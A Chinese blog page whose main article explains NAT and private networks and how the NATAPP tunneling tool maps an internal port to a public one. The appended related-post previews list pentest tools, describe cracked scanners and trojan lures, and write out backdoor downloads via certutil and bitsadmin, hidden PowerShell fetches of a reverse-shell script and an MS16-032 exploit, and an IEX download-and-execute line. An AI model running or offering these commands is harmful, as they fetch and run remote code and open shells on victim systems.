内网穿透

二叶草
二叶草
二叶草
1214
文章
0
评论
2020年3月25日19:22:18 评论 529
 学了网络之后,我们知道了公网和私网。私网是不能在公网传输和通信的。我们一个学校,一个小区,都是在自己单独的私网里面。通过这个私网内部的路由器(NAPT方式)和外界通信。
那么问题来了,假如我要和其他学校的小伙伴通信,那怎么办呢?我和小伙伴都是在单独的私网里面,而私网的地址是不能通信的,那么我怎么才能和他通信呢?

  

内网穿透

这就要说到内网穿透了!

如下图,有这么一个环境。小明和小王分别是清华和北大的学生。他们都各自处在自己学校的内网中,他们的ip地址可以是一样的,都是192.168.10.2。清华大学的小明想约北京大学的小王晚上吃饭。于是小明想给小王发一个消息,约她晚上一起吃饭。那么,小明该如何给小王发消息才能让小王收到消息呢?小明只知道小王的ip地址和自己的一样,都是192.168.10.2。很显然,如果小明给192.168.10.2这个ip地址发消息,小王是肯定不能收到消息的。

那么我们就会想,平时我们使用QQ、微信和其他地方、其他学校的小伙伴进行通信,消息是怎么发送的呢?

原因在于QQ和微信在公网有服务器。我们和小伙伴通信是先将消息发送给公网的服务器,公网服务器再将消息发送给位于私网内部的其他小伙伴。数据在我们和小伙伴之间并不是直接传送的。

那么问题又来了?

我们发消息给公网服务器这个可以理解,我们知道他们的公网ip,数据可以到达。但是,公网服务器是如何将我们发送给他的消息发送给位于其他私网内部的小伙伴的呢? 公网服务器并不知道位于私网内部的小伙伴的ip地址。

就算他知道了小伙伴私网边界的路由器的公网ip地址,发消息给路由器的公网ip,路由器收到消息也不会发送给小伙伴,因为在路由器里面并没有一条记录说收到qq或者微信服务器发来的消息然后转发给小王。

就算路由器知道从qq或者微信服务器发来的这条消息是转发给小王的,小王收到这条信息之后也不会接受。因为出于安全起见,除非是主机主动向对方发起了连接请求(这时会在该主机的数据结构中留下一条记录)。否则,当主机接收到数据包时,如果在其数据结构中查询不到对应的记录,那些不请自来的数据包将会被丢弃。

那么我们究竟是如何通过QQ或者微信和其他学校的小伙伴通信的呢?

我们首先看一个简单的情形,位于私网中的我们要访问百度,我们知道百度的域名:www.baidu.com 。于是,我们在浏览器中输入www.baidu.com ,然后我们就可以在百度上查阅我们想查的东西了。域名解析的过程我们不去分析,这个不是本文的重点。这里假设已经将域名进行解析了,解析成了对应的公网ip。当我们访问这个公网ip的时候,我们把流量交给路由器,路由器再根据ip地址请求百度的服务器。百度服务器回消息给路由器,路由器再把消息发送给我们。但是,内网中有这么多机器都是共用路由器的这一个地址,假如同时有好多人访问百度,那么路由器是如何知道百度回的消息是送给小王而不是小李的呢?因为在路由器体内有一个私网ip和端口的对照表,每个私网ip对应一个端口,所以根据端口就能知道消息是发送给内网中的哪台主机了。而我们是主动访问百度的,所以在我们的主机中会有一条记录,当我们接收到百度回的消息时,会接收这条数据。

假如小明以22222端口(随机,大于1024即可)访问百度服务器的80端口,则在我们本地可以看到这么一条连接:

192.168.10.10:22222  <——>  119.75.217.26:80

但是在路由器或者百度服务器上看到的连接则是这样的

100.100.10.10:10000 <——>  119.75.217.26

在路由器体内有这么一条Session记录

192.168.10.10:22222 <——> 10000

当我们访问百度这个事情做完之后的一定时间内,Session记录就会在路由器的体内消失,这个10000端口可以继续分配给其他用户

那么现在我们再来分析一下位于内网中的我们如何和同样是内网中的小伙伴通过QQ通信。

首先,当我们登陆上QQ后,我们就会和QQ的服务器建立一个长连接,基于这个长连接,我们可以给QQ服务器发送消息,QQ服务器也可以给我们发送消息(原理和上面百度的类似)。

我们有小伙伴的QQ号,于是我们给小伙伴QQ号发消息。这个消息通过我们私网边界的路由器发送给了QQ的服务器。QQ的服务器根据QQ号,会查找小伙伴是否在线。如果小伙伴此时也登录上了QQ号的话,那么QQ服务器就会把消息发送给小伙伴。如果小伙伴此时没有登录QQ,那么QQ服务器将不会给小伙伴发送这条消息,因为QQ服务器此时并没有和小伙伴建立长连接,所以他根本不知道小伙伴的位置。只有等小伙伴登录了QQ之后,QQ服务器才会将我们的消息发送给小伙伴。然后小伙伴回消息,后面的过程和之前一样

所以,要让位于两个私网内部主机通信的话,必须得有一个公网的服务器来做中间人,帮我们传递消息。我们私网内部是不能直接通信的!

 
 
 

内网穿透工具

常用的内网穿透的工具有:NAT APP基于ngrok的国内高速内网转发工具

这款软件可以把你内网的ip和端口映射成一个公网的ip和端口,这样,我们就可以实现内网穿透了!

去NAT APP的官网注册一个账号,然后点击购买隧道,选择免费隧道

这里我已经购买过了,所以点击我的隧道,这里可以修改你直接买的配置

然后我们在去运行这个软件, 怎么运行我就不说了,传送门——>Natapp使用教程

https://natapp.cn/article

./natapp -authtoken=7436320f81b1328e

最后给大家看运行软件的截图,它把我本地192.168.10.27:8888 的端口映射成了公网的 112.74.89.58:41553 ,所以,我们就实现了内网穿透。任何发往 112.74.89.58:41553 端口的数据都会被我们的 192.168.10.27:8888的端口给收到!

本文来源于:内网穿透-变化吧门户
特别声明:以上文章内容仅代表作者本人观点,不代表变化吧门户观点或立场。如有关于作品内容、版权或其它问题请于作品发表后的30日内与变化吧联系。

转载请注明:{{title}}-变化吧
  • 赞助本站
  • 微信扫一扫
  • weinxin
  • 赞助本站
  • 支付宝扫一扫
  • weinxin
二叶草
渗透测试实用工具 渗透

渗透测试实用工具

 工具概述 1、新增批量修改文件夹文件后缀功能,并重新排列工具,更加详细使用 2、新增文件夹监控功能,监控python tool.py -monitor C: 3、新增将包含rgb值的txt文件转换为png照片的实用功能python tool.py -r2i“ C: rgb.txt” -x 100 -y 200 4、新增去重功能,可以使用-delete 1.txt放入文件中所有重复的内容删除掉 优点:小巧,方便,强大,常见的编码方式应有尽有。 例如您输入:python tool.py -urlen =“ Hello China”您可以得到如下结果 原文:你好中国 网址编码:%48%65%6c%6c%6f%08%43%68%69%6e%61 使用说明 该工具设计的初衷是由于在渗透测试中经常会遇到一些新场景,但是没有很好的现成的工具,本着“自己动手丰衣足食”的想法,遇到需求就添加功能所以才有了 现在的它,工具现在还不是很完善!期待和你一起完善它! 您只需要下载即可使用,因为我已经将需要的东西全部封装起来 您只需要输入python tool.py就可以并且得到如下结果: Encoding&Decoding: -m        MD5 encryption -s        SH1 encryption -help     Show help information -b64      Base64 encode -b32      Base32 encode -b16      Base16 encode -db64     Base64 decode -db32     Base32 decode -db16     Base16 decode -urlen    URL encode -urlde    URL decode -unien    Unicode Encode Example:  -unien    "A"        Result: u0061 -unide    Unicode Decode                 Example:  -unide    "u0061"   Result: A -hten     HTML Encode ...
渗透测试最重要的工具竟然是 Word 和 PPT ? 渗透

渗透测试最重要的工具竟然是 Word 和 PPT ?

很多 CISO 极其信赖渗透测试——对公司基础设施的模拟攻击(通常是网络基础设施,但实体安全测试也会落入此模拟攻击范围)。意大利国家电力公司 Enel 的 CISO Yuri Rassega 也不例外。他表示,自己的公司每年对公司关键资产执行约 400 次深度漏洞测试,平均每天超过一次。 但若未清晰界定测试范围并达成共识,事情就有可能很快跑偏:网络安全公司 Coalfire 对爱荷华州法院的渗透测试就导致两名员工因非法侵入被捕。 正如 Coalfire 哀叹的:Coalfire 和州法院管理处认为已就工作范围中所含位置的实体安全评估达成了一致……最近的事件却表明他们对该协议的范围有不一样的解释。 渗透测试本身的定义也会出现类似的混乱。 漏洞奖励公司 HackerOne 的技术项目经理 Niels Schweisshelm 透露:一定不能弄混渗透测试和漏洞评估。漏洞评估的结果是系统中漏洞的概览,而渗透测试是通过结合并利用上述漏洞来揭示整体影响。 简言之,黑客侵入某系统可不仅仅是靠发现一个可打开网络的大漏洞。 恶意黑客入侵系统通常是先找出一个低级漏洞,然后结合其他一系列低级漏洞,一步步获取更高权限。 渗透测试的艰难时刻:他们决定进入完全 “红队” 模式 客户和渗透测试员之间的绝对清晰非常重要。 正如 Synopsys 高级首席顾问 Andrew van der Stock 强调的:真正的攻击者没有交战规则、时间限制和界限,但我们有。 我知道某前任雇主的一次渗透测试中就没提到数据渗漏方面的规则。一位年轻的团队成员发现了一个默认高权限账户。这是个应该上报的发现,但他们决定进入完全 ‘红队’ 模式,克隆并下载了一个大对象以供后续分析,抽干了系统的磁盘空间。该事件导致客户和测试员都陷入了艰难对话…… 沟通与许可为王。 谨慎选择供应商 Context Information Security 首席顾问兼红队主管 Rob Downie 称:大范围和高操作自由度的渗透测试常被归入 “红队” 或 “模拟攻击” 范畴讨论。这种类型的测试着眼全部安全控制,往往针对更高级和完备的防御团队,评估人员、过程和技术联动中的漏洞。 这可真实剖析公司防御表现,但也需要一些高级专业技能以安全可控的方式来规划、风险管理和交付。这就使得供应商选择对寻求此类服务的公司企业而言更加重要了。 优秀渗透测试员需具备哪些素质? 很明显,对操作系统和协议的深度理解是关键。对应用及工具工作原理和互动模式的敏锐目光,有助发现可组合使用的低级漏洞。 但 F-Secure Consulting 的技术总监 David Hartley 强调,良好的攻击性安全技术还仅仅是个开始。他指出:最终,渗透测试员工具箱中最重要的工具是 Word 和 Powerpint。 客户要的是结果,渗透测试员技术有多高明无关紧要,渗透测试对客户的价值是通过测试结果的有用程度和可执行程度体现的。渗透测试是深度技术评估,非技术人员未必总能理解其结果。 他补充道,帮助董事会理解测试发现的重要性,将测试结果映射至业务风险上,以及帮助客户解决这些风险,才是真正的挑战。在这方面,以攻击路径图的图形化方式呈现,往往比满屏的服务器 shell 截图有效得多。 专家们都用哪些工具? 攻击安全专家们都用哪些小工具针对你的公司呢?HackerOne 技术项目经理 Niels Schweisshelm 解释道:渗透测试员使用什么工具取决于评估的类型。 大多数渗透测试员会用 Burp Suite 执行 Web 应用渗透测试,Nmap 或 Masscan 则在基础设施渗透测试中更为重要。无论什么类型的测试活动,渗透测试员都必须了解测试目标,能够改造现有工具或撰写新工具来适应测试需求。 Synopsys 的 van der Stock 补充道:面对这个问题,大部分人会给出自己最钟爱的工具或套装名称,比如 “Burp Suite Pro” 或 “Kali”,但渗透测试工具包中最本质的部分是他们的脑子。 如果不具备攻击思维,没有任何工具帮得了你。第二重要的工具,是可供实操的脆弱应用,比如 OWASP...
简谈渗透测试各阶段我常用的那些“神器” 渗透

简谈渗透测试各阶段我常用的那些“神器”

 前言 本人所有文章都很用心的写作完成,并时常总结如何分享更有用的东西给朋友们。这篇更是如此,晚上准备到凌晨四点开始写作,为了需要的朋友而写,不喜欢的右上角点叉不要像上次文章一样在下面喷粪逼我骂你,另疏漏之处欢迎有心的道友下方补充帮助更多的朋友们。 flagellantX’s Windows Weapon 是我整理的在windows下针对基础入侵渗透的一个工具包,放置在百度网盘,为了方便需要的朋友使用和更新。 https://pan.baidu.com/s/1iKILpYMz0vM_x1zC3Xq3lA 提取密码:9efg 0x01 漏洞盲扫 我记得最先学安全的时候是从入侵渗透入手的,那时候入门的前辈讲的很清楚,告诉我要思维带着工具去扫,当时我不能完全理解,就使用既简单又有效的无外乎扫描器全上,所有域名全扫,也就是这个分类的由来,“盲扫” 硬件要求:如果要扫描器一起上,建议内存大于8GB,本人计算机是aw15-i7-6700/16GB awvs11: 安装包和破解补丁一并打包了,这款扫描器前身是wvs,目录下有awvs10.5,与11在界面上是完全不一样的(同时安装两者可能引起冲突),两者测试功能并不相差太多,我个人相对使用11较多,使用只要创建扫描(AddTarget)就可以开始,如图: Netsparker4.9.1.16896: 安装稍有不同需要将破解文件复制到软件根目录进行覆盖即可,然后填入域名即可开始扫描目标,如下: AppScan9.0.3.6: 主流的一款企业级扫描器,容量很大,也很强大,支持扫描webservice。下载需要花费时间,其它没有什么难度,相对扫描时间要比其它扫描器花费更多时间,电脑内存最好大于8GB,若是4GB内存只开appscan可以带起,不过不宜再多开其它漏扫。 安装包安装完成之后将动态链接库文件覆盖到根目录即可 选择需要的扫描类别,开始扫描后再问题处查看报出的漏洞情况。 Burpsuite1.7.26: Burp优秀的挖洞,数据分析、爆破、撞库功能下常常会忽略它的漏扫功能,这里将它放在漏扫是因为它确实能担当的住,这里分享的版本可以永久使用,监听好后访问目标域名选择sipder和scanner模块即可,这里不演示了。 uniscan6.2: kali下的uniscan,使用命令是uniscan -u (http://www.target.com/) -qweds,而在windows的版本需要搭建php环境,由于我自己目前windows下使用很少所以就不搭建了,它对于扫xss漏洞的能力十分强硬,而且十分全面可以挖掘泄露文件,我比较喜欢它的挖掘邮箱功能和找xss的能力,一个可以用于钓鱼,另一个可以拿来构造xss持久化控制。 DirBuster-0.12: 也是人人都知道的Fuzzing工具,就不多介绍了,我记得它有一些小功能比较突出,暂时忘了。 Safe3WVS 10.1: 用过的都知道是一个威力强劲的挖洞神器,又小又轻便,生成报告很快,不过不支持在虚拟机使用,使用给一个小建议,不要都勾上,单个单个扫效率更高。 WebRobot v1.8.2: 洪流前辈的作品,神级爬虫一出,心里自然有数,不用多说。 当然不仅仅是爬虫,我就很喜欢用它的域名爆破和链接分析。 御剑三件套: 御剑1.5+御剑后台扫描珍藏版+御剑无字典大小限制1937版。 几代人的回忆就不说了,经典中的经典,效果在现在用也不逊色,往往能给你惊喜,作者也说得很清楚,想念初恋而作,初恋就是这样,如果初恋很美,或许美在回忆那得不到回不去的过去。 字典的可自定义让御剑能一直御剑江湖,1.5内含的字典较全面。 Wscan6+Pker多线程后台极速扫描工具2.01: 这两款工具有些年代感,推荐它们是因为早期立过功,扫描速度很快很迅速,找后台找备份找db能力都不俗,其中pkav可是当时乌云的第一天团,办的培训也很靠谱,学成出山的高手众多,只是那时候我还在打酱油,钱不够,哈哈。 当然现在也不够,哈哈。 0x02 资源收集 收集的有:低级域名、url采集、端口扫描 子域名收集 Layer4.2纪念版: subDomainsBrute: 这两个子域收集使用肯定是最多的,在windows环境下layer的会比较方便。 端口扫描 zenmap: zenmap就不多介绍了,windows下的nmap,使用语法可以网上查找手册,进阶看这个:http://www.freebuf.com/column/149716.html。 Portscan+御剑TCP: 这两款我都非常喜欢,在win环境下使用非常方便,特别是御剑也的确配的上高速二字,另外一个端口扫描可以更全面的进一步了解,在内外网都可以有建树。 url采集: url采集可以用于扩大攻击面、收集低级域名、同站C段、新的exploit进行规模测试。 0x03 渗透测试 字典撞库 这招一般是用来配合burp进行挖洞测试的,因为这块准备的匆忙,所以就罗列了几个常用的字典。 中间件漏洞 测试工具是对st2和weblogic,jboss,WebSphere等。st2这款工具多被用于批量挖洞,中间件漏洞中常见端口例如8080,9000,7001 和常见路径例如/console/,/manager/html以及不同中间件对应的弱口令也要掌握,最好的中间件攻击手段是通过端口的弱口令设备爆破,其次才是exploit批量。 心脏出血 最好的检测工具莫过于CrowdStrike Heartbleed Scanner了,拿到网段就可以进行测试,无在乎外网内网。 IIS写权 同样也是拿到网段即可测试,用到的是经典工具IISPutScanner /桂林老兵前辈的iiswrite /08sec的IISPutScanner。 .svn源码泄露: 直接祭出法器就行了。 文件上传 我没有准备任何工具,但是准备了一份经典的文件上传漏洞详解,相信不熟悉的朋友看了就可以了解到: 口令爆破 我打包的是hydra,学习链接在freebuf中就可以找到很多:http://search.freebuf.com/search/?search=hydra#article。 编辑器漏洞 我打包了一个ietester,只要在网络上搜索对应编辑器漏洞就会有利用过程。 XSS+CSRF+SQLI: https://xsspt.com/,很nice的一个平台,不仅免费而且在学习栏目中收集了乌云的xss漏洞类别的所有漏洞案例,可以站在前人的肩膀上进行学习。 作为拓展也打包了慢雾科技老总黑客猥琐流派系创始人钟晨鸣和天融信阿尔法实验室国内html5攻防第一人徐少培的著作《Web前端黑客技术揭秘》来作为延伸提高资料。 CSRF就打包了两个常规测试的工具OWASP-CSRFTester和CSRF-Request-Builder使用方法只要你愿意在网络上搜索都可以轻松找到完美教程。 注入方面打包了胡萝卜穿山甲sqlmap的常用工具外,我还添加了一个SQLHunter的叫做注入猎人可以用来进行批量找注入点,但是需要你有代理到外面才可以用,另外我修改了一些sqlmap的脚本,例如你嫌它脱裤太慢,你可以把线程最高加到65535只要你机子吃得消,但是Windows线程Max是65535,Kali2.0线程Max是15750,过犹不及。 0x04 内网用具 NetFuke+Cain4.9: 作为老牌的内网杀器这两个大家都不陌生,前者用来域名劫持多,后者用来嗅探密码,但是动静太大,一不小心会把内网瘫痪掉,打包里有使用教程,Cain该隐的话看这个吧:https://www.jianshu.com/p/facff81a4826。 EvilFoca: 这款工具对内网渗透摸索过的朋友肯定也在用了,局域挂个黑页是手到擒来,但其实可以配合浏览器漏洞、钓鱼页面等等进行做到更多的事情,IE0DAY可以让目标劫持到漏洞网址进行exec木马,没有0day也可以构造一个上网助手页面,wifi.exe或者update.exe作为木马欺骗网内用户下载。工具打包了使用教程,文章是freebuf中作者写的,也可以在站内进行搜索。 局域网查看工具+MAC地址扫描+啊D网络工具包: 三款都是老工具,但是会搞的OG肯定都玩过这些,当年也是威力不俗的利器,比如肉鸡木马种植机,别告诉我你没玩过。 Wireshark: Intercepter-NG: 我要推的就是这款来自俄国的力量,功能十分强悍,集成内涵有x-scan,可以各种劫持,嗅探,注入,中间人,检测心脏出血,爆破等等各种功能可以驰骋内网,使用教程近日我会往微博发布,很吊但又是非常冷门的软件。 0x05 权限维持 废话不多说,先上图: webshell中内置了很多绕过各种安全软件的shell,也有很多可能被杀了,因为这篇是基础的入侵渗透,如果要相对高级冷门的shell可以看我微博的那篇1kb后门持久控制系统绕过安全软件。lcx和NtGodMode都是用来简单提权的,操作也简单,百度就可以很快找到,Cknife和caidao就都是webshell管理工具了,大家也都知道。权限维持的话我比较喜欢用RAT,所以今天的重点是分享的这三款:...
内网渗透工具- Intranet-Penetration 渗透

内网渗透工具- Intranet-Penetration

 整理一些常用的内外网渗透测试工具 PHPoxy 通过PHP脚本运行一个可以访问内网机器的Web代理。 SocksCap  socks5代理客户端 XX-Net    科学上网利器 phpsocks5  通过php脚本创建socks5代理服务 socks     包含创建socks5代理服务的python脚本,以及ssocks 内网穿透神器。 Cain      内网嗅探神器 F-NAScan    网络资产信息扫描 X-Sniff    网络嗅探小工具 asocks5     创建socks5代理服务的小公举 bc.pl      反弹bash shell的perl脚本 bypassUAC http    创建HTTP服务 l.7z    lcx的slave版本,免杀 n.7z     nc.exe smsniff2 抓包工具 wget     win版wget get.7z get64.7z mimikatz无交互版 直接shell下运行 get.7z (不是压缩文件) 常用命令 1、开web python2 -m SimpleHTTPServer python3 -m http.server 2、download backdoor certutil.exe -urlcache -split -f http://xxxx/g.jpg bitsadmin /rawreturn /transfer getfile http://xxxx/g.jpgc:p.7z 3、tty python -c 'import pty; pty.spawn("/bin/sh")' 4、powershell root@kali:/tmp# wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1 root@kali:/tmp# wget https://gist.githubusercontent.com/intrd/6dda33f61dca560e6996d01c62203374/raw/babf9a6afd23bb17a89bb3415099459db7bd25cf/ms16_032_intrd_mod.ps1 powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object    system.net.webclient).downloadfile('http://10.1.x.x:8000/Invoke-PowerShellTcp.ps1','Invoke-PowerShellTcp.ps1') powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object    system.net.webclient).downloadfile('http://10.1.x.x:8000/ms16_032_intrd_mod.ps1','ms16_032_intrd_mod.ps1') IEX (New-Object Net.WebClient).DownloadString('http://10.1.x.x:8000/ms16_032_intrd_mod.ps1');Invoke-MS16-032 "-...